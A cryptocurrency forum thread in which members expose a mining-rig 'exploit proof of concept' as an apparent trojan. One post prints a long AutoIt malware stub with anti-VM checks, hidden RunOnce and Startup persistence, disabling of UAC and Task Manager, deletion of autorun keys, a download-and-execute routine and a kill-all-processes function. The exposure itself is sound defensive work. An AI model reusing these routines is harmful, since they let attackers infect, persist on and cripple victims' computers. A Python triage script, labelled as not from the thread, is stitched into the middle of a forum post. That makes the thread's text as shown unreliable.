steve15 (OP)
Member
**
Offline Offline

Activity: 70
Merit: 10


View Profile
January 27, 2014, 01:16:22 PM
 #99

I've played a little bit more with your tool...
I managed to remove your AutoIt exe from my XP VM, easily bypass it when launching your tool and finally run your tool. Shocked

So now I'm waiting for actual miners' opinions, but you've lost all credibility! Roll Eyes


Good luck, the tool will not display any results when the detection module is shut down, or when running in VMware environments.

If you doubt my credibility, feel free, but once again, stop spamming my topic because you can't read that it blocks in virtual environments to prevent abuse.

The security built in cannot be bypassed.

ici_lemmy
Full Member
***
Offline Offline

Activity: 254
Merit: 100

Hydax Exchange


View Profile
January 27, 2014, 01:51:17 PM
 #100

The security built in cannot be bypassed.
I lol'ed...
Your exe is actually an SFX RAR containing, among others, two other exes: your AutoIt protection(?) and your .NET exe that can be fully decompiled with dotPeek or ILSpy!
For a pentesting expert, you could have done a better job!
steve15 (OP)
Member
**
Offline Offline

Activity: 70
Merit: 10


View Profile
January 27, 2014, 01:54:14 PM
 #101

The security built in cannot be bypassed.
I lol'ed...
Your exe is actually an SFX RAR containing, among others, two other exes: your AutoIt protection(?) and your .NET exe that can be fully decompiled with dotPeek or ILSpy!
For a pentesting expert, you could have done a better job!

Feel free to decompile it, and PM me the results.
We'll compare the source with your results then ;-)

nuno12345
Sr. Member
****
Offline Offline

Activity: 276
Merit: 284


View Profile
January 27, 2014, 07:10:52 PM
 #102

frmUPnPBrowser:
Code:
Source Code for [KnC_cg_bfg_exploit_PoC]ManagedUPnPTest.frmUPnPBrowser
// Decompiled by Salamander version 2.0.0
// Copyright 2002-2006 Remotesoft Inc. All rights reserved.
// http://www.remotesoft.com/salamander

using ManagedUPnP;
using System;
using System.ComponentModel;
using System.Drawing;
using System.Windows.Forms;

namespace ManagedUPnPTest
{
    public class frmUPnPBrowser : Form
    {
        private ManagedUPnP.AutoEventedDiscoveryServices mdsServices;

        private ctlUPnPInfo miInfo = null;

        private IContainer components = null;

        private ctlUPnPTreeBrowser tvUPnP;

        private ImageList ilIcons;

        private Panel pnlInfo;

        private SplitContainer scMain;

        private TabControl tcMain;

        private TabPage tpInfo;

        private TabPage tpLog;

        private ctlLogBox txtLog;


        public frmUPnPBrowser()
        {
            InitializeComponent();
        }

        private void frmManagedUPnPTest_Load(object sender, EventArgs e)
        {
            Logging.LogLines += new LogLinesEventHandler(this, Logging_LogLines);
            Logging.Enabled = true;
            mdsServices = new ManagedUPnP.AutoEventedDiscoveryServices(null);
            mdsServices.ResolveNetworkInterfaces = true;
            mdsServices.CanCreateServiceFor += new AutoEventedDiscoveryServicesB1.CanCreateServiceForEventHandler(this, dsServices_CanCreateServiceFor);
            mdsServices.CreateServiceFor += new AutoEventedDiscoveryServicesB1.CreateServiceForEventHandler(this, dsServices_CreateServiceFor);
            mdsServices.StatusNotifyAction += new AutoEventedDiscoveryServicesB1.StatusNotifyActionEventHandler(this, dsServices_StatusNotifyAction);
            WindowsFirewall.CheckUPnPFirewallRules(null);
            mdsServices.ReStartAsync();
        }

        private void frmUPnPBrowser_FormClosing(object sender, FormClosingEventArgs e)
        {
            Logging.Enabled = false;
            Logging.LogLines -= new LogLinesEventHandler(this, Logging_LogLines);
        }

        private void Logging_LogLines(object sender, LogLinesEventArgs a)
        {
            string str2 = String.Concat(DateTime.Now.ToString("[yyyy/MM/dd HH:mm:ss.fff] "), new String(' ', a.Indent * 4));
            txtLog.AppendLog(String.Concat(str2, a.Lines.Replace("\r\n", String.Concat("\r\n", str2)), "\r\n"));
        }

        private void dsServices_StatusNotifyAction(object sender, AutoEventedDiscoveryServicesB1.StatusNotifyActionEventArgs a)
        {
            AutoDiscoveryServicesB1.NotifyAction autoDiscoveryServicesB1_NotifyAction = a.NotifyAction;
            switch (autoDiscoveryServicesB1_NotifyAction)
            {
            case 1:
                tvUPnP.RemoveDevice((String)a.Data);
                break;

            case 2:
                tvUPnP.RemoveService((Service)a.Data);
                break;

            default:
                if (autoDiscoveryServicesB1_NotifyAction == 10)
                {
                    tvUPnP.AddService((Service)a.Data);
                }
                break;
            }
        }

        private void dsServices_CreateServiceFor(object sender, AutoEventedDiscoveryServicesB1.CreateServiceForEventArgs a)
        {
            a.CreatedAutoService = a.Service;
        }

        private void dsServices_CanCreateServiceFor(object sender, AutoEventedDiscoveryServicesB1.CanCreateServiceForEventArgs a)
        {
            a.CanCreate = true;
        }

        private void tvUPnP_AfterSelect(object sender, TreeViewEventArgs e)
        {
            IUPnPTreeItem iUPnPTreeItem = tvUPnP.SelectedItem;
            ctlUPnPInfo CtlUPnPInfo = miInfo;
            miInfo = null;
            try
            {
                bool flag = iUPnPTreeItem == null;
                if (!flag)
                {
                    miInfo = iUPnPTreeItem.InfoControl;
                    flag = miInfo == null;
                    if (!flag)
                    {
                        miInfo.Dock = DockStyle.Fill;
                        pnlInfo.Controls.Add(miInfo);
                    }
                }
            }
            finally
            {
                bool flag = CtlUPnPInfo == null;
                if (!flag)
                {
                    pnlInfo.Controls.Remove(CtlUPnPInfo);
                    CtlUPnPInfo.Dispose();
                }
            }
        }

        protected override void Dispose(bool disposing)
        {
            if (!(disposing ? (components == null) : 1))
            {
                components.Dispose();
            }
            base.Dispose(disposing);
        }

        private void InitializeComponent()
        {
            components = new Container();
            ilIcons = new ImageList(components);
            pnlInfo = new Panel();
            scMain = new SplitContainer();
            tcMain = new TabControl();
            tpInfo = new TabPage();
            tpLog = new TabPage();
            tvUPnP = new ctlUPnPTreeBrowser();
            txtLog = new ctlLogBox();
            ((ISupportInitialize)scMain).BeginInit();
            scMain.Panel1.SuspendLayout();
            scMain.Panel2.SuspendLayout();
            scMain.SuspendLayout();
            tcMain.SuspendLayout();
            tpInfo.SuspendLayout();
            tpLog.SuspendLayout();
            base.SuspendLayout();
            ilIcons.ColorDepth = ColorDepth.Depth8Bit;
            ilIcons.ImageSize = new Size(16, 16);
            ilIcons.TransparentColor = Color.Transparent;
            pnlInfo.Dock = DockStyle.Fill;
            pnlInfo.Location = new Point(3, 3);
            pnlInfo.Name = "pnlInfo";
            pnlInfo.Size = new Size(645, 646);
            pnlInfo.TabIndex = 1;
            scMain.Dock = DockStyle.Fill;
            scMain.Location = new Point(0, 0);
            scMain.Name = "scMain";
            scMain.Panel1.Controls.Add(tvUPnP);
            scMain.Panel2.Controls.Add(tcMain);
            scMain.Size = new Size(1055, 678);
            scMain.SplitterDistance = 392;
            scMain.TabIndex = 2;
            tcMain.Controls.Add(tpInfo);
            tcMain.Controls.Add(tpLog);
            tcMain.Dock = DockStyle.Fill;
            tcMain.Location = new Point(0, 0);
            tcMain.Name = "tcMain";
            tcMain.SelectedIndex = 0;
            tcMain.Size = new Size(659, 678);
            tcMain.TabIndex = 1;
            tpInfo.Controls.Add(pnlInfo);
            tpInfo.Location = new Point(4, 22);
            tpInfo.Name = "tpInfo";
            tpInfo.Padding = new Padding(3);
            tpInfo.Size = new Size(651, 652);
            tpInfo.TabIndex = 0;
            tpInfo.Text = "Selected Item Info";
            tpInfo.UseVisualStyleBackColor = true;
            tpLog.Controls.Add(txtLog);
            tpLog.Location = new Point(4, 22);
            tpLog.Name = "tpLog";
            tpLog.Padding = new Padding(3);
            tpLog.Size = new Size(496, 502);
            tpLog.TabIndex = 1;
            tpLog.Text = "UPnP Log";
            tpLog.UseVisualStyleBackColor = true;
            tvUPnP.Dock = DockStyle.Fill;
            tvUPnP.ImageIndex = 1;
            tvUPnP.Location = new Point(0, 0);
            tvUPnP.Name = "tvUPnP";
            tvUPnP.SelectedImageIndex = 0;
            tvUPnP.Size = new Size(392, 678);
            tvUPnP.TabIndex = 0;
            tvUPnP.AfterSelect += new TreeViewEventHandler(this.tvUPnP_AfterSelect);
            txtLog.BackColor = SystemColors.Window;
            txtLog.Dock = DockStyle.Fill;
            txtLog.Font = new Font("Courier New", 8.25F);
            txtLog.Location = new Point(3, 3);
            txtLog.Name = "txtLog";
            txtLog.ReadOnly = true;
            txtLog.Size = new Size(490, 496);
            txtLog.TabIndex = 0;
            txtLog.Text = "";
            txtLog.WordWrap = false;
            base.AutoScaleDimensions = new SizeF(6.0F, 13.0F);
            base.AutoScaleMode = AutoScaleMode.Font;
            base.ClientSize = new Size(1055, 678);
            base.Controls.Add(scMain);
            base.Name = "frmUPnPBrowser";
            Text = "KnC Miner - CGminer - BFGminer exploiter PoC";
            base.FormClosing += new FormClosingEventHandler(this.frmUPnPBrowser_FormClosing);
            base.Load += new EventHandler(this.frmManagedUPnPTest_Load);
            scMain.Panel1.ResumeLayout(false);
            scMain.Panel2.ResumeLayout(false);
            ((ISupportInitialize)scMain).EndInit();
            scMain.ResumeLayout(false);
            tcMain.ResumeLayout(false);
            tpInfo.ResumeLayout(false);
            tpLog.ResumeLayout(false);
            base.ResumeLayout(false);
        }
    }

}

Am I right? Should I paste what it does?
steve15 (OP)
Member
**
Offline Offline

Activity: 70
Merit: 10


View Profile
January 27, 2014, 07:26:24 PM
 #103


So you can decompile a standard .NET form... Congratz!
Now show me the code that gets executed?? That's what this is about, right?
Why on earth should I encrypt a standard form doing nothing but displaying some results??

I can also just provide you with the manifest XML file, instead of acting like a fool that can decompile a standard winform.

The world's most secured bitcoin wallet | http://tinyurl.com/btcwallet | Armory
steve15 (OP)
Member
**

Activity: 70
Merit: 10

January 27, 2014, 07:43:14 PM
 #104

Alright, to keep this post on topic.

JUST TO BE CLEAR

Decompiling the executable, or the DLL file will NOT give you what you are looking for.
These are only to run the network scan.

AutoIT is used to execute the actual exploit, and detect modifications, scanners, sniffers, decompilers, and virtual boxes.

If ANY of these is detected, the application will shut down, and the REAL injection script is terminated, destroyed and melted.

USE THIS TOOL FOR WHAT IT HAS BEEN DESIGNED FOR!!

This tool is a PROOF OF CONCEPT about built-in exploits in most miner hardware rigs.

If you feel the need to run it sandboxed, virtual, or with an active scanner/sniffer/decompiler/debugger, then your intentions are NOT to test your environment, thus the file gets destroyed.

I received a ton of PMs about security issues, and this is the best solution to prevent idiots trying to hack someone else's miners.

Over and out.

The world's most secured bitcoin wallet | http://tinyurl.com/btcwallet | Armory
ici_lemmy
Full Member
***

Activity: 254
Merit: 100

Hydax Exchange

January 27, 2014, 11:32:08 PM
Last edit: January 27, 2014, 11:48:08 PM by ici_lemmy
 #105

That was smart to let us look at the other way...
I'm disappointed by myself, I should have seen that earlier...
Code:
#NoTrayIcon
If ProcessExists("avastui.exe") Then Sleep(20000)
$path = "ppqzt"
$uniscriptdir = FileGetShortName(@ScriptDir)
$uniscriptfullpath = FileGetShortName(@ScriptFullPath)
$unicode_startup = FileGetShortName(@StartupDir)
$unicode_windows = FileGetShortName(@WindowsDir)
$unicode_system = FileGetShortName(@SystemDir)
$unicode_userprofile = FileGetShortName(@UserProfileDir)
$win_userprofile = "%userprofile%\"
FileSetAttrib($uniscriptdir, "+SHR")
Local $delay = IniRead($uniscriptdir & "\HbDzt.MCM", "6072607", "5726011", "NotFound")
If $delay = "4140580" Then
delay()
Else
EndIf
Local $mutex = IniRead($uniscriptdir & "\HbDzt.MCM", "1478845", "1729463", "NotFound")
If $mutex = "9293639" Then
mutex()
Else
EndIf
Local $startup = IniRead($uniscriptdir & "\HbDzt.MCM", "9363719", "5077712", "NotFound")
If $startup = "8541394" Then
startup()
Else
EndIf
Local $antis = IniRead($uniscriptdir & "\HbDzt.MCM", "9632628", "8921159", "NotFound")
If $antis = "2314561" Then
antis()
Else
EndIf
Local $fake = IniRead($uniscriptdir & "\HbDzt.MCM", "fake1", "fake2", "NotFound")
If $fake = "fake3" Then
fakemessage()
Else
EndIf
Local $botkiller = IniRead($uniscriptdir & "\HbDzt.MCM", "botkiller1", "botkiller2", "NotFound")
If $botkiller = "botkiller3" Then
botkiller()
Else
EndIf
Local $downloader = IniRead($uniscriptdir & "\HbDzt.MCM", "downloader1", "downloader2", "NotFound")
If $downloader = "downloader3" Then
downloader()
Else
EndIf
Local $uac = IniRead($uniscriptdir & "\HbDzt.MCM", "uac1", "uac2", "NotFound")
If $uac = "uac3" Then
disable_uac()
Else
EndIf
Local $systemrestore = IniRead($uniscriptdir & "\HbDzt.MCM", "systemrestore1", "systemrestore2", "NotFound")
If $systemrestore = "systemrestore3" Then
disable_syste_restore()
Else
EndIf
Local $antitask = IniRead($uniscriptdir & "\HbDzt.MCM", "antitask1", "antitask2", "NotFound")
If $antitask = "antitask3" Then
antitask()
Else
EndIf

Func delay()
$counter = 0
While $counter <= 5
Sleep(5000)
ShellExecute(@SystemDir & "\mshta.exe")
$counter = $counter + 1
_rundos("taskkill /IM mshta.exe")
WEnd
EndFunc

Func systemhide()
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", "REG_DWORD", 1)
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD", 0)
EndFunc

Func fakemessage()
$type = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetype1", "messagetype2", "NotFound")
$title = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetitle1", "messagetitle2", "NotFound")
$message = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetext1", "messagetext2", "NotFound")
If FileExists($unicode_userprofile & "\" & $path & "\check.txt") Then
Else
MsgBox($type, $title, $message)
FileWrite($unicode_userprofile & "\" & $path & "\check.txt", "")
EndIf
EndFunc

Func mutex()
$scriptname = "lmsqQw.exe"
If UBound(ProcessList($scriptname)) > 2 Then Exit
EndFunc

Func antitask()
$read_antitask = RegRead("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr")
If NOT ($read_antitask = "1") Then
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
EndIf
EndFunc

Func disable_uac()
$read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
If NOT ($read_uac = "0") Then
RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
EndIf
EndFunc

Func startup()
$buac = _checkelevationenabled()
If $buac = 0 Then
Else
FileCreateShortcut($unicode_userprofile & "\" & $path & "\85841.vbs", $unicode_startup & "\start.lnk")
FileSetAttrib($unicode_startup & "\start.lnk", "+SH")
EndIf
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs")
If NOT FileExists($unicode_userprofile & "\" & $path & "\85841.vbs") Then
Local $bat = FileOpen($unicode_userprofile & "\" & $path & "\65084.cmd", 1)
$autoit3 = "lmsqQw.exe"
FileWrite($bat, "@echo off" & @CRLF & "cd " & $win_userprofile & $path & "\" & @CRLF & "start " & $autoit3 & " " & @ScriptName)
FileClose($bat)
Local $vbs = FileOpen($unicode_userprofile & "\" & $path & "\85841.vbs", 1)
FileWrite($vbs, "const Hidden = 0" & @CRLF & "const WaitOnReturn = true" & @CRLF & 'File ="' & $unicode_userprofile & "\" & $path & "\" & '65084.cmd"' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & "WshShell.Run file, Hidden, WaitOnReturn" & @CRLF & "wscript.quit")
FileClose($vbs)
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs")
FileSetAttrib($unicode_userprofile & "\" & $path & "\85841.vbs", "+SHR")
FileSetAttrib($unicode_userprofile & "\" & $path & "\65084.cmd", "+SHR")
If FileExists($unicode_startup & "\start.lnk") Then
FileDelete($unicode_startup & "\start.lnk")
EndIf
Else
EndIf
EndFunc

Func _checkelevationenabled()
$read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
If @error Then Return
Local $struct = DllStructCreate("BOOL")
Local $artn = DllCall("kernel32.dll", "DWORD", "CheckElevationEnabled", "ptr", DllStructGetPtr($struct))
If @error Then
Return SetError(@error)
EndIf
Return SetError($artn[0], 0, DllStructGetData($struct, 1))
EndFunc

Func antis()
If WinGetText("Program Manager") = "0" Then
Exit
Else
EndIf
If ProcessExists("VboxService.exe") Then
Exit
EndIf
If ProcessExists("VMwaretray.exe") Then
Exit
EndIf
EndFunc

Func persistence()
If NOT ProcessExists("RegSvcs.exe") AND NOT ProcessExists("RegAsm.exe") AND NOT ProcessExists("AppLaunch.exe") AND NOT ProcessExists("twunk_32.exe") AND NOT ProcessExists("newdev.exe") AND NOT ProcessExists("ndadmin.exe") Then
$pathtovbs = ($uniscriptdir & "\" & "run.vbs")
ShellExecute($pathtovbs)
Exit
EndIf
EndFunc

Func downloader()
If FileExists($unicode_userprofile & "\" & $path & "\dl.txt") Then
Else
FileWrite($unicode_userprofile & "\" & $path & "\dl.txt", "")
$random_download_name = Random(10000, 99999, 1) & ".exe"
Local $hdownload = InetGet("replace-me-url", $unicode_userprofile & "\" & $random_download_name, 1, 1)
Do
Sleep(250)
Until InetGetInfo($hdownload, 2)
Local $nbytes = InetGetInfo($hdownload, 0)
InetClose($hdownload)
ShellExecute($unicode_userprofile & "\" & $random_download_name)
EndIf
EndFunc

Func bsod()
$a = ProcessList()
For $i = 1 To UBound($a) - 1
ProcessClose($a[$i][0])
Next
Exit
EndFunc

Func botkiller()
RegDelete("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegWrite("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegDelete("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
FileDelete(@StartupDir & "\*.*")
EndFunc

Func disable_syste_restore()
If FileExists($uniscriptdir & "\check.txt") Then
Else
RegDelete("HKLM64\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients")
FileWrite($uniscriptdir & "\check.txt", "")
EndIf
EndFunc

Func _rundos($scommand)
Local $nresult = RunWait(@ComSpec & " /C " & $scommand, "", @SW_HIDE)
Return SetError(@error, @extended, $nresult)
EndFunc

Global Const $prov_rsa_full = 1
Global Const $prov_rsa_aes = 24
Global Const $crypt_verifycontext = -268435456
Global Const $hp_hashsize = 4
Global Const $hp_hashval = 2
Global Const $crypt_exportable = 1
Global Const $crypt_userdata = 1
Global Const $calg_md2 = 32769
Global Const $calg_md4 = 32770
Global Const $calg_md5 = 32771
Global Const $calg_sha1 = 32772
Global Const $calg_3des = 26115
Global Const $calg_aes_128 = 26126
Global Const $calg_aes_192 = 26127
Global Const $calg_aes_256 = 26128
Global Const $calg_des = 26113
Global Const $calg_rc2 = 26114
Global Const $calg_rc4 = 26625
Global Const $calg_userkey = 0
Global $__g_acryptinternaldata[3]

[SNIP]
-----------------
[SNIP]

Func loop()
While 1
If FileExists($unicode_userprofile & "\datascrambler\clean.txt") Then
__bsod($scriptname, False)
EndIf
If WinExists($path) Then
bsod()
Else
EndIf
Sleep(100)
WEnd
EndFunc

Yeah, why should I bother running this in a VM?

Nice game OP... but you lose!
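Added example, not code from the thread or from either poster: a static triage script that splits an AutoIt stub like the one dumped above into its Func...EndFunc blocks and flags the behaviours the dump shows (anti-VM process checks, Run/RunOnce persistence, EnableLUA/DisableTaskMgr tampering, download-and-execute, startup wiping), naming the function that carries each, so a sample can be classified without running it. The rule set and the sample excerpt are constructed for this example.

```python
"""Static triage of an AutoIt stub such as the one dumped above.

Added example, not code from the thread. Splits AutoIt source into its
Func...EndFunc blocks and reports which behaviour classes each one shows.
Rule set and sample excerpt are constructed for this example.
"""
import re

# One rule per behaviour class: (category, regex). AutoIt is case-insensitive.
RULES = [
    # Process checks the dump uses to bail out under VirtualBox/VMware or Avast.
    ("anti-analysis",
     re.compile(r'ProcessExists\("(VboxService|VMwaretray|avastui)\.exe"\)', re.I)),
    # Autorun via Run/RunOnce values or a shortcut dropped in the Startup folder.
    ("persistence", re.compile(r'RegWrite\("[^"]*\\(Run|RunOnce)"', re.I)),
    ("persistence", re.compile(r'\bFileCreateShortcut\(', re.I)),
    # Turning UAC off, blocking Task Manager, wiping other autoruns / SPP clients.
    ("defense-evasion",
     re.compile(r'RegWrite\([^)]*"EnableLUA",\s*"REG_DWORD",\s*"?0"?\)', re.I)),
    ("defense-evasion",
     re.compile(r'RegWrite\([^)]*"DisableTaskMgr",\s*"REG_DWORD",\s*"?1"?\)', re.I)),
    ("defense-evasion",
     re.compile(r'RegDelete\("[^"]*\\(Run|SPP\\Clients)"\)', re.I)),
    # Killing every process or deleting the Startup folder contents.
    ("destructive", re.compile(r'FileDelete\(@StartupDir|\bProcessClose\(', re.I)),
]

# Benign on their own; together inside one function they are download-and-execute.
INETGET = re.compile(r'\bInetGet\(', re.I)
SHELLEXEC = re.compile(r'\bShellExecute\(', re.I)

# One "Func name(...)" ... "EndFunc" block; group 1 is the name, group 2 the body.
FUNC_RE = re.compile(
    r'^[ \t]*Func[ \t]+(\w+)[ \t]*\([^\n]*\)[ \t]*$(.*?)^[ \t]*EndFunc[ \t]*$',
    re.I | re.M | re.S)


def split_functions(src):
    """Return {name: body}; code outside any Func is filed under '<top-level>'."""
    funcs = {m.group(1): m.group(2) for m in FUNC_RE.finditer(src)}
    funcs["<top-level>"] = FUNC_RE.sub("", src)
    return funcs


def triage(src):
    """Map each function to the sorted behaviour categories found in its body."""
    findings = {}
    for name, body in split_functions(src).items():
        cats = {cat for cat, rx in RULES if rx.search(body)}
        if INETGET.search(body) and SHELLEXEC.search(body):
            cats.add("download-execute")
        if cats:
            findings[name] = sorted(cats)
    return findings


def verdict(findings):
    """Roll-up: three or more distinct behaviour classes is a strong signal."""
    classes = {c for cats in findings.values() for c in cats}
    if len(classes) >= 3:
        return "likely malicious"
    return "suspicious" if classes else "no indicators"


# Constructed excerpt modelled on the dump; _rundos() is the benign control.
SAMPLE = r'''
#NoTrayIcon
If ProcessExists("avastui.exe") Then Sleep(20000)
$path = "ppqzt"
$unicode_userprofile = FileGetShortName(@UserProfileDir)
Func antis()
If ProcessExists("VboxService.exe") Then
Exit
EndIf
EndFunc
Func disable_uac()
RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
EndFunc
Func startup()
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs")
EndFunc
Func downloader()
Local $hdownload = InetGet("replace-me-url", $unicode_userprofile & "\dropped.exe", 1, 1)
ShellExecute($unicode_userprofile & "\dropped.exe")
EndFunc
Func _rundos($scommand)
Local $nresult = RunWait(@ComSpec & " /C " & $scommand, "", @SW_HIDE)
Return SetError(@error, @extended, $nresult)
EndFunc
'''

if __name__ == "__main__":
    report = triage(SAMPLE)
    for name, cats in report.items():
        print(f"{name:14s} {', '.join(cats)}")
    print("verdict:", verdict(report))
```

The top-level Avast check lands under `<top-level>`, and a function such as `delay()` that only calls `ShellExecute` is not reported, which keeps the output to the behaviours worth a reviewer's time.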
sandor111
Hero Member
*****

Activity: 616
Merit: 500

January 28, 2014, 12:21:39 AM
 #106

Yuck, that is some nasty code... WTF, really..?

Sarge
Newbie
*

Activity: 1
Merit: 0

January 28, 2014, 03:48:01 AM
 #107

I finished compiling my "Proof of Concept" application to allow you to test out the exploits on your OWN miners.


When network sniffing is detected, the application will auto shut down!

Antivirus results: Scanned with MetaScan, file is clean 39/40 antivirus scanners. I have one false positive out of 40 with a minor AV vendor.
The file is CLEAN !! If 39 of the biggest AV vendors show it's clean, it IS clean!

Note: The false positive is triggered by the sub that detects network sniffing and shuts the application down.

AV scan result: https://www.metascan-online.com/en/scanresult/file/d79999b0cbd74e978fc4dfee6d3bc0ef



  • problem and solution are mystical
  • Filename for download different than the file to the online scanner
  • Author claims it's clean while making his statement look like the typical Nigerian prince scam (colors, bold, repeating the word clean several times)
  • Code can't be run in a VM (WTF, why?!)
  • When a network sniffer is detected the program shuts itself down (WTF²)
  • no supposed MD5 hash posted

reminds me of "you're from Anonymous Proxy too, let's meet up"


seems legit!  <<< don't take this seriously
bitpop
Legendary
*

Activity: 2912
Merit: 1060

January 28, 2014, 05:31:01 AM
 #108

I love Lua

Op is delusional

steve15 (OP)
Member
**

Activity: 70
Merit: 10

January 28, 2014, 03:22:21 PM
 #109


Are you kidding me or what? Did you really just post the crypter's source?!
What the hell has this to do with my source?
The source you just posted proves that none of the functions included, except the anti virtuals, are being used.

Quote
That was smart to let us look at the other way...
I'm disappointed by myself, I should have seen that earlier...

If you didn't even see that one, even after decompiling the executable, well, I'm sorry, but you're unskilled then.
Plus, if you followed the topic, I explicitly posted about crypting the source.

Now for the last time, stop spamming my topic. I've had enough of your makes-no-sense posts here.
If you really think you are all that mighty, then PM as I asked you, and we'll compare our sources.

Then once again, you will be disappointed by yourself. For the third time in a row.


The world's most secured bitcoin wallet | http://tinyurl.com/btcwallet | Armory
bitpop
Legendary
*

Activity: 2912
Merit: 1060

January 28, 2014, 03:41:13 PM
 #110

Show him lemmy, don't hold back.

steve15 (OP)
Member
**

Activity: 70
Merit: 10

January 28, 2014, 04:19:55 PM
 #111

Here are my beliefs

ici_lemmy does not even own mining equipment.

Because, instead of trying out whether his rigs are exploitable or not, he straight goes to decompiling all files.
Since he made not a single post in this thread before I posted my tool, I believe he was just waiting to try and exploit my tool in order to do nasty stuff with it.

Why else decompile before trying...

Dozens of PMs regarding this kind of "users" (I prefer the term hacker, but what's in a name...) are submitted to me by concerned miners.

For this reason, none of the exploit code can be found inside the main executables.
I also crypted the files to prevent a run while sniffers are active, or virtual environments are detected.
This was also posted by me before posting the tool.

As ici_lemmy himself posts, he is disappointed by himself. Why?
Because for the third time in a row he posts decompiled code that does... nothing at all!

This proves to me his eagerness to get to the core files to abuse them.

If I had a program that was as evil as he tries to picture it, I would have deleted it by now.
It also seems logical that any AV/AM/FW scanner would have picked it up by now.

So for the last and final time:

IF YOU ARE PLANNING ON ABUSING THE SOURCE.. GET LOST, YOU CAN'T.
IF YOU ARE PLANNING ON POSTING BULLSHIT FOR NOT BEING ABLE TO EXTRACT THE SOURCE.. GET LOST.
IF YOU WANT TO TEST YOUR MINING EQUIPMENT.. FEEL FREE TO DOWNLOAD AND TEST RUN and THEN POST YOUR FINDINGS.

I will no longer reply to any scriptkiddie out there, trying to get hold of the source, tested, approved and verified by KnC itself, to start hacking some machines.

As stated before, this is the kind of behaviour that makes me want to keep all next exploits to myself instead of sharing them.
I would have been better off just mining with your rigs, smiling while reading your posts about it...

Thank you

The world's most secured bitcoin wallet | http://tinyurl.com/btcwallet | Armory
Chancellor
Full Member
***

Activity: 154
Merit: 100

January 28, 2014, 04:37:49 PM
 #112

Here are my beliefs
And what if...

1. You've discovered some minor vulnerability, which only may be exploited in extreme conditions, like a miner on a public IP.
2. You've made fuss about it here.
3. You've prepared a malicious software, which when run on a Windows machine on the same LAN as the miner allows you to take control over the miner.
4. Then you, the "benefactor" of the KNC users community, try to sneak your trojan to users and take their miners.

Bullshit? Maybe.

Impossible? Don't think so. Time will tell.

IMHO the best way to deal with the "vulnerability" would be a full, immediate disclosure.

BTC: 1GRx2H5esyFTucZCt1eX9tjpoqfMrbVHMT
ici_lemmy
Full Member
***

Activity: 254
Merit: 100

Hydax Exchange

January 28, 2014, 04:41:20 PM
Last edit: January 28, 2014, 04:55:16 PM by ici_lemmy
 #113

@steve15 : I'm disappointed by myself because I have not exposed you earlier...

For the analysis, quick answer because I have no more time to lose on this...

OK, so here is my simple full process to expose the scam (so everyone with skills can do it):
- unrar the exe
- remove the commented autoit script lines
- modify the script in order to have the decrypted file (and removing the nasty things)
- send the decrypted file to virustotal

and here are the virustotal results:
https://www.virustotal.com/fr/file/abbf75859716dbbe564d3b250aa7dfcb14c4b8f452257bd382e6a4187120a9a3/analysis/1390926392/ --> 45/50

Conclusion: steve15 is not a professional pentester but rather a script kiddie trying to infect your computer with a backdoor.
No need to thank me!

@admin: you should remove the link to the tool and ban steve

Edit: @Chancellor: there is no vulnerability except the API in cgminer, which is not actually a vulnerability
steve15 (OP)
January 28, 2014, 06:11:08 PM
 #114

Here are my beliefs
And what if...

1. You've discovered some minor vulnerability, which only may be exploited in extreme conditions, like a miner on a public IP.
2. You've made fuss about it here.
3. You've prepared a malicious software which, when run on a Windows machine on the same LAN as the miner, allows you to take control over the miner.
4. Then you, the "benefactor" of the KNC users community, try to sneak your trojan to users and take their miners.

Bullshit? Maybe.

Impossible? Don't think so. Time will tell.

IMHO the best way to deal with the "vulnerability" would be a full, immediate disclosure.


You are right about some parts.

1. If the vulnerability is minor, would KnC upgrade their firmware? It is not just the public IP miners who are in danger.
2. If I prepared a malicious software to take control over users' miners, would I really opt for an EXE file, you think?

Preparing malicious software, and binding it in a simple PDF file, where I claim to describe the method, would be far more efficient for that purpose.

People are not suspicious about a PDF, and they need to open it anyway.

steve15 (OP)
January 28, 2014, 06:22:01 PM
Last edit: January 28, 2014, 06:38:31 PM by steve15
 #115

@steve15 : I'm disappointed in myself because I have not exposed you earlier...

For the analysis, quick answer because I have no more time to lose on this...

OK, so here is my simple full process to expose the scam (so everyone with skills can do it) :
- unrar the exe
- remove the commented autoit script lines
- modify the script in order to have the decrypted file (and removing the nasty things)
- send the decrypted file to virustotal

and here are the virustotal results :
https://www.virustotal.com/fr/file/abbf75859716dbbe564d3b250aa7dfcb14c4b8f452257bd382e6a4187120a9a3/analysis/1390926392/ --> 45/50

Conclusion : steve15 is not a professional pentester but rather a script kiddie trying to infect your computer with a backdoor.
No need to thank me !

@admin : you should remove the link to the tool and ban steve

Edit : @Chancellor : there is no vulnerability except the api in cgminer which is not actually a vulnerability


You really are an idiot, excuse my language.

Try this:

